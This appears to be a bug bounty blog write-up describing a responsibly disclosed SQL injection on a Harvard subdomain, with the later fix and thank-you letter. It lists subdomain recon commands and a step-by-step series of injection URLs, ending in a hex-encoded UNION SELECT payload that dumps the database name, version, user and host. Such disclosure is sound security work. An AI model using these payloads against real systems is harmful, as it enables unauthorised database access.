SQL Injection in Harvard’s Subdomain

Bibek Neupane
PenTester Nepal
Published in
3 min readApr 17, 2022

Hi there! I’m Bibek Neupane from Nepal. In this first-ever write-up of mine, I’ll try to cover my story of finding a SQL Injection on Harvard’s subdomain after tons of duplicated XSS.

Let’s start hehe


I started my usual recon, collecting subdomains using assetfinder by TomNomNom and subfinder by ProjectDiscovery. To get more results, I’ve set API keys in subfinder’s config file. Here’s a great guide by DhiyaneshDK.

1. echo "harvard.edu"|assetfinder -subs-only |tee ast.txt
2. echo "harvard.edu"|subfinder |tee sub.txt
3. cat ast.txt sub.txt| sort -u >>subdomains.txt

Then I passed the subdomains to httpx by ProjectDiscovery. And ran nuclei for low-hanging bugs [ obviously duplicate ] in the background while I manually look interesting subdomains in my browser.

1. FOR NUCLEI: cat subdomains.txt| httpx| nuclei -t ~/nuclei-templates/ -es info |tee nucleiResult.txt
2. For Manual Testing: cat subdomains.txt| httpx -title -status-code -content-length

So, while the nuclei were running in the background, I checked subdomains with interesting names or titles from the output of httpx.

The Real Hunt:

I opened a subdomain that I found interesting: profile.itatti.harvard.edu while my browser’s Network tab was on and I was constantly observing the requests where one request caught my eye. It was a GET request to /suggest-wstates.php?q=undefined endpoint. A PHP endpoint right? I quickly fired up my Burp, intercepted the request, and sent it to Repeater where I started testing for SQLI. Here are the steps:

  1. https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined’ == some contents of the response was missing,
  2. https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined’ --+ == contents came back, error fixed,
  3. SQLI Sus! Tried guessing the number of columns in the database: https://profile.itatti.harvard.edu /suggest-wstates.php?q=undefined’ +order+by+3 --+ == contents missing again,
  4. https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined’ +order+by+2--+ == contents came back again, so number of columns = 2
  5. Trying union based injection: https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined’ +union+select+1,2--+
  6. In response to the 5th request, 1 appeared in the response. That means, we can inject in place of 1 in https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined’ +union+select+1,2 --+
  7. Tried dumping database name and did it successfully: https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined'+union+select+database(),2--+ and I got database name in the response :)
  8. Tried to dump database name, version, user, port, and hostname with my name embedded in the payload; FINAL PAYLOAD: https://profile.itatti.harvard.edu/suggest-wstates.php?q=undefined%27+union+select+concat(0x3c2f6f7074696f6e3e3c2f73656c6563743e3c68313e53514c4920627920426962656b204e657570616e652028206e623162336b20293c62723e,0x3c62723e,0x44617461626173653a20,database(),0x3c62723e,0x56657273696f6e3a20,@@version,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x506f72743a20,@@PORT,0x3c62723e,0x486f73746e616d653a20,@@HOSTNAME),2--+
Response after final payload :)

Dissection Of Final Payload:


Here, inside concat, the first part before the comma is a hex-encoded form of </option></select><h1>SQLI by Bibek Neupane ( nb1b3k )<br>. The </option></select> tag escapes out of the option and select tag so that the output gets printed when rendered. After the first hex, 0x3c62723e decodes to <br> tag which would break the line. Then in 0x44617461626173653a20,database(), the 0x44617461626173653a20 decodes to Database: which would print the database name as
Database: database_name. The same goes for printing the version, user, port, and hostname.


I quickly wrote a report and included this POC, sent it to security@harvard.edu with my finger-crossed. It got accepted, they resolved the vulnerability and I received a “Thank You” letter from Harvard CISO <3

Here’s a good write-up on exploiting SQL Injections manually by goswamiijaya.

Report Timeline:

Reported: Feb 11, 2022

Response[ met all our requirements for a “Thank You” letter ]: Thu, Mar 31

Resolved and “Thank You” letter received: April 15

Thank you for reading my write-up <3 and thanks to Veshraj dai for proofreading.

